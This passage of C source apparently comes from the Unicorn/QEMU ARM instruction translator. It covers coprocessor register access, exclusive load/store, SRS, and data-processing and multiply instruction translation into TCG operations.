tcg_temp_free_i64(tcg_ctx, tmp64); store_reg(s, rt2, tmp); } else { TCGv_i32 tmp; if (ri->type & ARM_CP_CONST) { tmp = tcg_const_i32(tcg_ctx, ri->resetvalue); } else if (ri->readfn) { TCGv_ptr tmpptr; tmp = tcg_temp_new_i32(tcg_ctx); tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_get_cp_reg(tcg_ctx, tmp, tcg_ctx->cpu_env, tmpptr); tcg_temp_free_ptr(tcg_ctx, tmpptr); } else { tmp = load_cpu_offset(tcg_ctx, ri->fieldoffset); } if (rt == 15) { /* Destination register of r15 for 32 bit loads sets * the condition codes from the high 4 bits of the value */ gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp); } else { store_reg(s, rt, tmp); } } } else { /* Write */ if (ri->type & ARM_CP_CONST) { /* If not forbidden by access permissions, treat as WI */ return 0; } if (is64) { TCGv_i32 tmplo, tmphi; TCGv_i64 tmp64 = tcg_temp_new_i64(tcg_ctx); tmplo = load_reg(s, rt); tmphi = load_reg(s, rt2); tcg_gen_concat_i32_i64(tcg_ctx, tmp64, tmplo, tmphi); tcg_temp_free_i32(tcg_ctx, tmplo); tcg_temp_free_i32(tcg_ctx, tmphi); if (ri->writefn) { TCGv_ptr tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_set_cp_reg64(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tmp64); tcg_temp_free_ptr(tcg_ctx, tmpptr); } else { tcg_gen_st_i64(tcg_ctx, tmp64, tcg_ctx->cpu_env, ri->fieldoffset); } tcg_temp_free_i64(tcg_ctx, tmp64); } else { if (ri->writefn) { TCGv_i32 tmp; TCGv_ptr tmpptr; tmp = load_reg(s, rt); tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_set_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tmp); tcg_temp_free_ptr(tcg_ctx, tmpptr); tcg_temp_free_i32(tcg_ctx, tmp); } else { TCGv_i32 tmp = load_reg(s, rt); store_cpu_offset(tcg_ctx, tmp, ri->fieldoffset); } } } /* I/O operations must end the TB here (whether read or write) */ need_exit_tb = ((tb_cflags(s->base.tb) & CF_USE_ICOUNT) && (ri->type & ARM_CP_IO)); if (!isread && !(ri->type & ARM_CP_SUPPRESS_TB_END)) { /* * A write to any coprocessor register that ends a TB * must rebuild the hflags for the next TB. */ TCGv_i32 tcg_el = tcg_const_i32(tcg_ctx, s->current_el); if (arm_dc_feature(s, ARM_FEATURE_M)) { gen_helper_rebuild_hflags_m32(tcg_ctx, tcg_ctx->cpu_env, tcg_el); } else { if (ri->type & ARM_CP_NEWEL) { gen_helper_rebuild_hflags_a32_newel(tcg_ctx, tcg_ctx->cpu_env); } else { gen_helper_rebuild_hflags_a32(tcg_ctx, tcg_ctx->cpu_env, tcg_el); } } tcg_temp_free_i32(tcg_ctx, tcg_el); /* * We default to ending the TB on a coprocessor register write, * but allow this to be suppressed by the register definition * (usually only necessary to work around guest bugs). */ need_exit_tb = true; } if (need_exit_tb) { gen_lookup_tb(s); } return 0; } /* Unknown register; this might be a guest error or a QEMU * unimplemented feature. */ if (is64) { qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch32 " "64 bit system register cp:%d opc1: %d crm:%d " "(%s)\n", isread ? "read" : "write", cpnum, opc1, crm, s->ns ? "non-secure" : "secure"); } else { qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch32 " "system register cp:%d opc1:%d crn:%d crm:%d opc2:%d " "(%s)\n", isread ? "read" : "write", cpnum, opc1, crn, crm, opc2, s->ns ? "non-secure" : "secure"); } return 1; } /* Store a 64-bit value to a register pair. Clobbers val. */ static void gen_storeq_reg(DisasContext *s, int rlow, int rhigh, TCGv_i64 val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, val); store_reg(s, rlow, tmp); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrh_i64_i32(tcg_ctx, tmp, val); store_reg(s, rhigh, tmp); } /* load and add a 64-bit value from a register pair. */ static void gen_addq(DisasContext *s, TCGv_i64 val, int rlow, int rhigh) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tmp; TCGv_i32 tmpl; TCGv_i32 tmph; /* Load 64-bit value rd:rn. */ tmpl = load_reg(s, rlow); tmph = load_reg(s, rhigh); tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, tmp, tmpl, tmph); tcg_temp_free_i32(tcg_ctx, tmpl); tcg_temp_free_i32(tcg_ctx, tmph); tcg_gen_add_i64(tcg_ctx, val, val, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } /* Set N and Z flags from hi|lo. */ static void gen_logicq_cc(TCGContext *tcg_ctx, TCGv_i32 lo, TCGv_i32 hi) { tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, hi); tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_ZF, lo, hi); } /* Load/Store exclusive instructions are implemented by remembering the value/address loaded, and seeing if these are the same when the store is performed. This should be sufficient to implement the architecturally mandated semantics, and avoids having to monitor regular stores. The compare vs the remembered value is done during the cmpxchg operation, but we must compare the addresses manually. */ static void gen_load_exclusive(DisasContext *s, int rt, int rt2, TCGv_i32 addr, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); MemOp opc = size | MO_ALIGN | s->be_data; s->is_ldex = true; if (size == 3) { TCGv_i32 tmp2 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); /* For AArch32, architecturally the 32-bit word at the lowest * address is always Rt and the one at addr+4 is Rt2, even if * the CPU is big-endian. That means we don't want to do a * gen_aa32_ld_i64(), which invokes gen_aa32_frob64() as if * for an architecturally 64-bit access, but instead do a * 64-bit access using MO_BE if appropriate and then split * the two halves. * This only makes a difference for BE32 user-mode, where * frob64() must not flip the two halves of the 64-bit data * but this code must treat BE32 user-mode like BE32 system. */ TCGv taddr = gen_aa32_addr(s, addr, opc); tcg_gen_qemu_ld_i64(tcg_ctx, t64, taddr, get_mem_index(s), opc); tcg_temp_free(tcg_ctx, taddr); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, t64); if (s->be_data == MO_BE) { tcg_gen_extr_i64_i32(tcg_ctx, tmp2, tmp, t64); } else { tcg_gen_extr_i64_i32(tcg_ctx, tmp, tmp2, t64); } tcg_temp_free_i64(tcg_ctx, t64); store_reg(s, rt2, tmp2); } else { gen_aa32_ld_i32(s, tmp, addr, get_mem_index(s), opc); tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, tmp); } store_reg(s, rt, tmp); tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, addr); } static void gen_clrex(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); } static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2, TCGv_i32 addr, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1, t2; TCGv_i64 extaddr; TCGv taddr; TCGLabel *done_label; TCGLabel *fail_label; MemOp opc = size | MO_ALIGN | s->be_data; /* if (env->exclusive_addr == addr && env->exclusive_val == [addr]) { [addr] = {Rt}; {Rd} = 0; } else { {Rd} = 1; } */ fail_label = gen_new_label(tcg_ctx); done_label = gen_new_label(tcg_ctx); extaddr = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, extaddr, addr); tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, extaddr, tcg_ctx->cpu_exclusive_addr, fail_label); tcg_temp_free_i64(tcg_ctx, extaddr); taddr = gen_aa32_addr(s, addr, opc); t0 = tcg_temp_new_i32(tcg_ctx); t1 = load_reg(s, rt); if (size == 3) { TCGv_i64 o64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 n64 = tcg_temp_new_i64(tcg_ctx); t2 = load_reg(s, rt2); /* For AArch32, architecturally the 32-bit word at the lowest * address is always Rt and the one at addr+4 is Rt2, even if * the CPU is big-endian. Since we're going to treat this as a * single 64-bit BE store, we need to put the two halves in the * opposite order for BE to LE, so that they end up in the right * places. * We don't want gen_aa32_frob64() because that does the wrong * thing for BE32 usermode. */ if (s->be_data == MO_BE) { tcg_gen_concat_i32_i64(tcg_ctx, n64, t2, t1); } else { tcg_gen_concat_i32_i64(tcg_ctx, n64, t1, t2); } tcg_temp_free_i32(tcg_ctx, t2); tcg_gen_atomic_cmpxchg_i64(tcg_ctx, o64, taddr, tcg_ctx->cpu_exclusive_val, n64, get_mem_index(s), opc); tcg_temp_free_i64(tcg_ctx, n64); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, o64, o64, tcg_ctx->cpu_exclusive_val); tcg_gen_extrl_i64_i32(tcg_ctx, t0, o64); tcg_temp_free_i64(tcg_ctx, o64); } else { t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t2, tcg_ctx->cpu_exclusive_val); tcg_gen_atomic_cmpxchg_i32(tcg_ctx, t0, taddr, t2, t1, get_mem_index(s), opc); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, t0, t0, t2); tcg_temp_free_i32(tcg_ctx, t2); } tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free(tcg_ctx, taddr); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_R[rd], t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_gen_br(tcg_ctx, done_label); gen_set_label(tcg_ctx, fail_label); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[rd], 1); gen_set_label(tcg_ctx, done_label); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); } /* gen_srs: * @env: CPUARMState * @s: DisasContext * @mode: mode field from insn (which stack to store to) * @amode: addressing mode (DA/IA/DB/IB), encoded as per P,U bits in ARM insn * @writeback: true if writeback bit set * * Generate code for the SRS (Store Return State) insn. */ static void gen_srs(DisasContext *s, uint32_t mode, uint32_t amode, bool writeback) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int32_t offset; TCGv_i32 addr, tmp; bool undef = false; /* SRS is: * - trapped to EL3 if EL3 is AArch64 and we are at Secure EL1 * and specified mode is monitor mode * - UNDEFINED in Hyp mode * - UNPREDICTABLE in User or System mode * - UNPREDICTABLE if the specified mode is: * -- not implemented * -- not a valid mode number * -- a mode that's at a higher exception level * -- Monitor, if we are Non-secure * For the UNPREDICTABLE cases we choose to UNDEF. */ if (s->current_el == 1 && !s->ns && mode == ARM_CPU_MODE_MON) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_uncategorized(), 3); return; } if (s->current_el == 0 || s->current_el == 2) { undef = true; } switch (mode) { case ARM_CPU_MODE_USR: case ARM_CPU_MODE_FIQ: case ARM_CPU_MODE_IRQ: case ARM_CPU_MODE_SVC: case ARM_CPU_MODE_ABT: case ARM_CPU_MODE_UND: case ARM_CPU_MODE_SYS: break; case ARM_CPU_MODE_HYP: if (s->current_el == 1 || !arm_dc_feature(s, ARM_FEATURE_EL2)) { undef = true; } break; case ARM_CPU_MODE_MON: /* No need to check specifically for "are we non-secure" because * we've already made EL0 UNDEF and handled the trap for S-EL1; * so if this isn't EL3 then we must be non-secure. */ if (s->current_el != 3) { undef = true; } break; default: undef = true; } if (undef) { unallocated_encoding(s); return; } addr = tcg_temp_new_i32(tcg_ctx); tmp = tcg_const_i32(tcg_ctx, mode); /* get_r13_banked() will raise an exception if called from System mode */ gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); gen_helper_get_r13_banked(tcg_ctx, addr, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); switch (amode) { case 0: /* DA */ offset = -4; break; case 1: /* IA */ offset = 0; break; case 2: /* DB */ offset = -8; break; case 3: /* IB */ offset = 4; break; default: abort(); } tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); tmp = load_reg(s, 14); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); tcg_temp_free_i32(tcg_ctx, tmp); tmp = load_cpu_field(tcg_ctx, spsr); tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); tcg_temp_free_i32(tcg_ctx, tmp); if (writeback) { switch (amode) { case 0: offset = -8; break; case 1: offset = 4; break; case 2: offset = -4; break; case 3: offset = 0; break; default: abort(); } tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); tmp = tcg_const_i32(tcg_ctx, mode); gen_helper_set_r13_banked(tcg_ctx, tcg_ctx->cpu_env, tmp, addr); tcg_temp_free_i32(tcg_ctx, tmp); } tcg_temp_free_i32(tcg_ctx, addr); s->base.is_jmp = DISAS_UPDATE; } /* Generate a label used for skipping this instruction */ static void arm_gen_condlabel(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!s->condjmp) { s->condlabel = gen_new_label(tcg_ctx); s->condjmp = 1; } } /* Skip this instruction if the ARM condition is false */ static void arm_skip_unless(DisasContext *s, uint32_t cond) { TCGContext *tcg_ctx = s->uc->tcg_ctx; arm_gen_condlabel(s); arm_gen_test_cc(tcg_ctx, cond ^ 1, s->condlabel); } /* * Constant expanders for the decoders. */ static int negate(DisasContext *s, int x) { return -x; } static int plus_2(DisasContext *s, int x) { return x + 2; } static int times_2(DisasContext *s, int x) { return x * 2; } static int times_4(DisasContext *s, int x) { return x * 4; } /* Return only the rotation part of T32ExpandImm. */ static int t32_expandimm_rot(DisasContext *s, int x) { return x & 0xc00 ? extract32(x, 7, 5) : 0; } /* Return the unrotated immediate from T32ExpandImm. */ static int t32_expandimm_imm(DisasContext *s, int x) { uint32_t imm = extract32(x, 0, 8); switch (extract32(x, 8, 4)) { case 0: /* XY */ /* Nothing to do. */ break; case 1: /* 00XY00XY */ imm *= 0x00010001; break; case 2: /* XY00XY00 */ imm *= 0x01000100; break; case 3: /* XYXYXYXY */ imm *= 0x01010101; break; default: /* Rotated constant. */ imm |= 0x80; break; } return imm; } static int t32_branch24(DisasContext *s, int x) { /* Convert J1:J2 at x[22:21] to I2:I1, which involves I=J^~S. */ x ^= !(x < 0) * (3 << 21); /* Append the final zero. */ return x << 1; } static int t16_setflags(DisasContext *s) { return s->condexec_mask == 0; } static int t16_push_list(DisasContext *s, int x) { return (x & 0xff) | (x & 0x100) << (14 - 8); } static int t16_pop_list(DisasContext *s, int x) { return (x & 0xff) | (x & 0x100) << (15 - 8); } /* * Include the generated decoders. */ #include "decode-a32.inc.c" #include "decode-a32-uncond.inc.c" #include "decode-t32.inc.c" #include "decode-t16.inc.c" /* Helpers to swap operands for reverse-subtract. */ static void gen_rsb(TCGContext *tcg_ctx, TCGv_i32 dst, TCGv_i32 a, TCGv_i32 b) { tcg_gen_sub_i32(tcg_ctx, dst, b, a); } static void gen_rsb_CC(TCGContext *tcg_ctx, TCGv_i32 dst, TCGv_i32 a, TCGv_i32 b) { gen_sub_CC(tcg_ctx, dst, b, a); } static void gen_rsc(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 a, TCGv_i32 b) { gen_sub_carry(tcg_ctx, dest, b, a); } static void gen_rsc_CC(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 a, TCGv_i32 b) { gen_sbc_CC(tcg_ctx, dest, b, a); } /* * Helpers for the data processing routines. * * After the computation store the results back. * This may be suppressed altogether (STREG_NONE), require a runtime * check against the stack limits (STREG_SP_CHECK), or generate an * exception return. Oh, or store into a register. * * Always return true, indicating success for a trans_* function. */ typedef enum { STREG_NONE, STREG_NORMAL, STREG_SP_CHECK, STREG_EXC_RET, } StoreRegKind; static bool store_reg_kind(DisasContext *s, int rd, TCGv_i32 val, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (kind) { case STREG_NONE: tcg_temp_free_i32(tcg_ctx, val); return true; case STREG_NORMAL: /* See ALUWritePC: Interworking only from a32 mode. */ if (s->thumb) { store_reg(s, rd, val); } else { store_reg_bx(s, rd, val); } return true; case STREG_SP_CHECK: store_sp_checked(s, val); return true; case STREG_EXC_RET: gen_exception_return(s, val); return true; } g_assert_not_reached(); // never reach here return true; } /* * Data Processing (register) * * Operate, with set flags, one register source, * one immediate shifted register source, and a destination. */ static bool op_s_rrr_shi(DisasContext *s, arg_s_rrr_shi *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp1, tmp2; tmp2 = load_reg(s, a->rm); gen_arm_shift_im(tcg_ctx, tmp2, a->shty, a->shim, logic_cc); tmp1 = load_reg(s, a->rn); gen(tcg_ctx, tmp1, tmp1, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp1); } return store_reg_kind(s, a->rd, tmp1, kind); } static bool op_s_rxr_shi(DisasContext *s, arg_s_rrr_shi *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; tmp = load_reg(s, a->rm); gen_arm_shift_im(tcg_ctx, tmp, a->shty, a->shim, logic_cc); gen(tcg_ctx, tmp, tmp); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp); } return store_reg_kind(s, a->rd, tmp, kind); } /* * Data-processing (register-shifted register) * * Operate, with set flags, one register source, * one register shifted register source, and a destination. */ static bool op_s_rrr_shr(DisasContext *s, arg_s_rrr_shr *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp1, tmp2; tmp1 = load_reg(s, a->rs); tmp2 = load_reg(s, a->rm); gen_arm_shift_reg(tcg_ctx, tmp2, a->shty, tmp1, logic_cc); tmp1 = load_reg(s, a->rn); gen(tcg_ctx, tmp1, tmp1, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp1); } return store_reg_kind(s, a->rd, tmp1, kind); } static bool op_s_rxr_shr(DisasContext *s, arg_s_rrr_shr *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp1, tmp2; tmp1 = load_reg(s, a->rs); tmp2 = load_reg(s, a->rm); gen_arm_shift_reg(tcg_ctx, tmp2, a->shty, tmp1, logic_cc); gen(tcg_ctx, tmp2, tmp2); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp2); } return store_reg_kind(s, a->rd, tmp2, kind); } /* * Data-processing (immediate) * * Operate, with set flags, one register source, * one rotated immediate, and a destination. * * Note that logic_cc && a->rot setting CF based on the msb of the * immediate is the reason why we must pass in the unrotated form * of the immediate. */ static bool op_s_rri_rot(DisasContext *s, arg_s_rri_rot *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp1, tmp2; uint32_t imm; imm = ror32(a->imm, a->rot); if (logic_cc && a->rot) { tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, imm >> 31); } tmp2 = tcg_const_i32(tcg_ctx, imm); tmp1 = load_reg(s, a->rn); gen(tcg_ctx, tmp1, tmp1, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp1); } return store_reg_kind(s, a->rd, tmp1, kind); } static bool op_s_rxi_rot(DisasContext *s, arg_s_rri_rot *a, void (*gen)(TCGContext *, TCGv_i32, TCGv_i32), int logic_cc, StoreRegKind kind) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; uint32_t imm; imm = ror32(a->imm, a->rot); if (logic_cc && a->rot) { tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, imm >> 31); } tmp = tcg_const_i32(tcg_ctx, imm); gen(tcg_ctx, tmp, tmp); if (logic_cc) { gen_logic_CC(tcg_ctx, tmp); } return store_reg_kind(s, a->rd, tmp, kind); } #define DO_ANY3(NAME, OP, L, K) \ static bool trans_##NAME##_rrri(DisasContext *s, arg_s_rrr_shi *a) \ { StoreRegKind k = (K); return op_s_rrr_shi(s, a, OP, L, k); } \ static bool trans_##NAME##_rrrr(DisasContext *s, arg_s_rrr_shr *a) \ { StoreRegKind k = (K); return op_s_rrr_shr(s, a, OP, L, k); } \ static bool trans_##NAME##_rri(DisasContext *s, arg_s_rri_rot *a) \ { StoreRegKind k = (K); return op_s_rri_rot(s, a, OP, L, k); } #define DO_ANY3_unicorn(NAME, OP, L, K) \ static bool trans_##NAME##_rrri(DisasContext *s, arg_s_rrr_shi *a) \ { StoreRegKind k = K(s, a->rd, a->rn, &a->s); return op_s_rrr_shi(s, a, OP, L, k); } \ static bool trans_##NAME##_rrrr(DisasContext *s, arg_s_rrr_shr *a) \ { StoreRegKind k = K(s, a->rd, a->rn, &a->s); return op_s_rrr_shr(s, a, OP, L, k); } \ static bool trans_##NAME##_rri(DisasContext *s, arg_s_rri_rot *a) \ { StoreRegKind k = K(s, a->rd, a->rn, &a->s); return op_s_rri_rot(s, a, OP, L, k); } #define DO_ANY2(NAME, OP, L, K) \ static bool trans_##NAME##_rxri(DisasContext *s, arg_s_rrr_shi *a) \ { StoreRegKind k = (K); return op_s_rxr_shi(s, a, OP, L, k); } \ static bool trans_##NAME##_rxrr(DisasContext *s, arg_s_rrr_shr *a) \ { StoreRegKind k = (K); return op_s_rxr_shr(s, a, OP, L, k); } \ static bool trans_##NAME##_rxi(DisasContext *s, arg_s_rri_rot *a) \ { StoreRegKind k = (K); return op_s_rxi_rot(s, a, OP, L, k); } #define DO_ANY2_unicorn(NAME, OP, L, K) \ static bool trans_##NAME##_rxri(DisasContext *s, arg_s_rrr_shi *a) \ { StoreRegKind k = K(s, a->rd, &a->s); return op_s_rxr_shi(s, a, OP, L, k); } \ static bool trans_##NAME##_rxrr(DisasContext *s, arg_s_rrr_shr *a) \ { StoreRegKind k = K(s, a->rd, &a->s); return op_s_rxr_shr(s, a, OP, L, k); } \ static bool trans_##NAME##_rxi(DisasContext *s, arg_s_rri_rot *a) \ { StoreRegKind k = K(s, a->rd, &a->s); return op_s_rxi_rot(s, a, OP, L, k); } #define DO_CMP2(NAME, OP, L) \ static bool trans_##NAME##_xrri(DisasContext *s, arg_s_rrr_shi *a) \ { return op_s_rrr_shi(s, a, OP, L, STREG_NONE); } \ static bool trans_##NAME##_xrrr(DisasContext *s, arg_s_rrr_shr *a) \ { return op_s_rrr_shr(s, a, OP, L, STREG_NONE); } \ static bool trans_##NAME##_xri(DisasContext *s, arg_s_rri_rot *a) \ { return op_s_rri_rot(s, a, OP, L, STREG_NONE); } DO_ANY3(AND, tcg_gen_and_i32, a->s, STREG_NORMAL) DO_ANY3(EOR, tcg_gen_xor_i32, a->s, STREG_NORMAL) DO_ANY3(ORR, tcg_gen_or_i32, a->s, STREG_NORMAL) DO_ANY3(BIC, tcg_gen_andc_i32, a->s, STREG_NORMAL) DO_ANY3(RSB, a->s ? gen_rsb_CC : gen_rsb, false, STREG_NORMAL) DO_ANY3(ADC, a->s ? gen_adc_CC : gen_add_carry, false, STREG_NORMAL) DO_ANY3(SBC, a->s ? gen_sbc_CC : gen_sub_carry, false, STREG_NORMAL) DO_ANY3(RSC, a->s ? gen_rsc_CC : gen_rsc, false, STREG_NORMAL) DO_CMP2(TST, tcg_gen_and_i32, true) DO_CMP2(TEQ, tcg_gen_xor_i32, true) DO_CMP2(CMN, gen_add_CC, false) DO_CMP2(CMP, gen_sub_CC, false) DO_ANY3(ADD, a->s ? gen_add_CC : tcg_gen_add_i32, false, a->rd == 13 && a->rn == 13 ? STREG_SP_CHECK : STREG_NORMAL) /* * Note for the computation of StoreRegKind we return out of the * middle of the functions that are expanded by DO_ANY3, and that * we modify a->s via that parameter before it is used by OP. */ static StoreRegKind get_storage3(DisasContext *s, int rd, int rn, int *as) { StoreRegKind ret = STREG_NORMAL; if (rd == 15 && *as) { /* * See ALUExceptionReturn: * In User mode, UNPREDICTABLE; we choose UNDEF. * In Hyp mode, UNDEFINED. */ if (IS_USER(s) || s->current_el == 2) { unallocated_encoding(s); return true; } /* There is no writeback of nzcv to PSTATE. */ *as = 0; ret = STREG_EXC_RET; } else if (rd == 13 && rn == 13) { ret = STREG_SP_CHECK; } return ret; } DO_ANY3_unicorn(SUB, a->s ? gen_sub_CC : tcg_gen_sub_i32, false, get_storage3) static StoreRegKind get_storage2(DisasContext *s, int rd, int *as) { StoreRegKind ret = STREG_NORMAL; if (rd == 15 && *as) { /* * See ALUExceptionReturn: * In User mode, UNPREDICTABLE; we choose UNDEF. * In Hyp mode, UNDEFINED. */ if (IS_USER(s) || s->current_el == 2) { unallocated_encoding(s); return true; } /* There is no writeback of nzcv to PSTATE. */ *as = 0; ret = STREG_EXC_RET; } else if (rd == 13) { ret = STREG_SP_CHECK; } return ret; } DO_ANY2_unicorn(MOV, tcg_gen_mov_i32, a->s, get_storage2) DO_ANY2(MVN, tcg_gen_not_i32, a->s, STREG_NORMAL) /* * ORN is only available with T32, so there is no register-shifted-register * form of the insn. Using the DO_ANY3 macro would create an unused function. */ static bool trans_ORN_rrri(DisasContext *s, arg_s_rrr_shi *a) { return op_s_rrr_shi(s, a, tcg_gen_orc_i32, a->s, STREG_NORMAL); } static bool trans_ORN_rri(DisasContext *s, arg_s_rri_rot *a) { return op_s_rri_rot(s, a, tcg_gen_orc_i32, a->s, STREG_NORMAL); } #undef DO_ANY3 #undef DO_ANY2 #undef DO_CMP2 static bool trans_ADR(DisasContext *s, arg_ri *a) { store_reg_bx(s, a->rd, add_reg_for_lit(s, 15, a->imm)); return true; } static bool trans_MOVW(DisasContext *s, arg_MOVW *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!ENABLE_ARCH_6T2) { return false; } tmp = tcg_const_i32(tcg_ctx, a->imm); store_reg(s, a->rd, tmp); return true; } static bool trans_MOVT(DisasContext *s, arg_MOVW *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!ENABLE_ARCH_6T2) { return false; } tmp = load_reg(s, a->rd); tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); tcg_gen_ori_i32(tcg_ctx, tmp, tmp, a->imm << 16); store_reg(s, a->rd, tmp); return true; } /* * Multiply and multiply accumulate */ static bool op_mla(DisasContext *s, arg_s_rrrr *a, bool add) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); tcg_gen_mul_i32(tcg_ctx, t1, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); if (add) { t2 = load_reg(s, a->ra); tcg_gen_add_i32(tcg_ctx, t1, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); } if (a->s) { gen_logic_CC(tcg_ctx, t1); } store_reg(s, a->rd, t1); return true; } static bool trans_MUL(DisasContext *s, arg_MUL *a) { return op_mla(s, a, false); } static bool trans_MLA(DisasContext *s, arg_MLA *a) { return op_mla(s, a, true); } static bool trans_MLS(DisasContext *s, arg_MLS *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1, t2; if (!ENABLE_ARCH_6T2) { return false; } t1 = load_reg(s, a->rn); t2 = load_reg(s, a->rm); tcg_gen_mul_i32(tcg_ctx, t1, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); t2 = load_reg(s, a->ra); tcg_gen_sub_i32(tcg_ctx, t1, t2, t1); tcg_temp_free_i32(tcg_ctx, t2); store_reg(s, a->rd, t1); return true; } static bool op_mlal(DisasContext *s, arg_s_rrrr *a, bool uns, bool add) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1, t2, t3; t0 = load_reg(s, a->rm); t1 = load_reg(s, a->rn); if (uns) { tcg_gen_mulu2_i32(tcg_ctx, t0, t1, t0, t1); } else { tcg_gen_muls2_i32(tcg_ctx, t0, t1, t0, t1); } if (add) { t2 = load_reg(s, a->ra); t3 = load_reg(s, a->rd); tcg_gen_add2_i32(tcg_ctx, t0, t1, t0, t1, t2, t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } if (a->s) { gen_logicq_cc(tcg_ctx, t0, t1); } store_reg(s, a->ra, t0); store_reg(s, a->rd, t1); return true; } static bool trans_UMULL(DisasContext *s, arg_UMULL *a) { return op_mlal(s, a, true, false); } static bool trans_SMULL(DisasContext *s, arg_SMULL *a) { return op_mlal(s, a, false, false); } static bool trans_UMLAL(DisasContext *s, arg_UMLAL *a) { return op_mlal(s, a, true, true); } static bool trans_SMLAL(DisasContext *s, arg_SMLAL *a) { return op_mlal(s, a, false, true); } static bool trans_UMAAL(DisasContext *s, arg_UMAAL *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t0, t1, t2, zero; if (s->thumb ? !arm_dc_feature(s, ARM_FEATURE_THUMB_DSP) : !ENABLE_ARCH_6) { return false; } t0 = load_reg(s, a->rm); t1 = load_reg(s, a->rn); 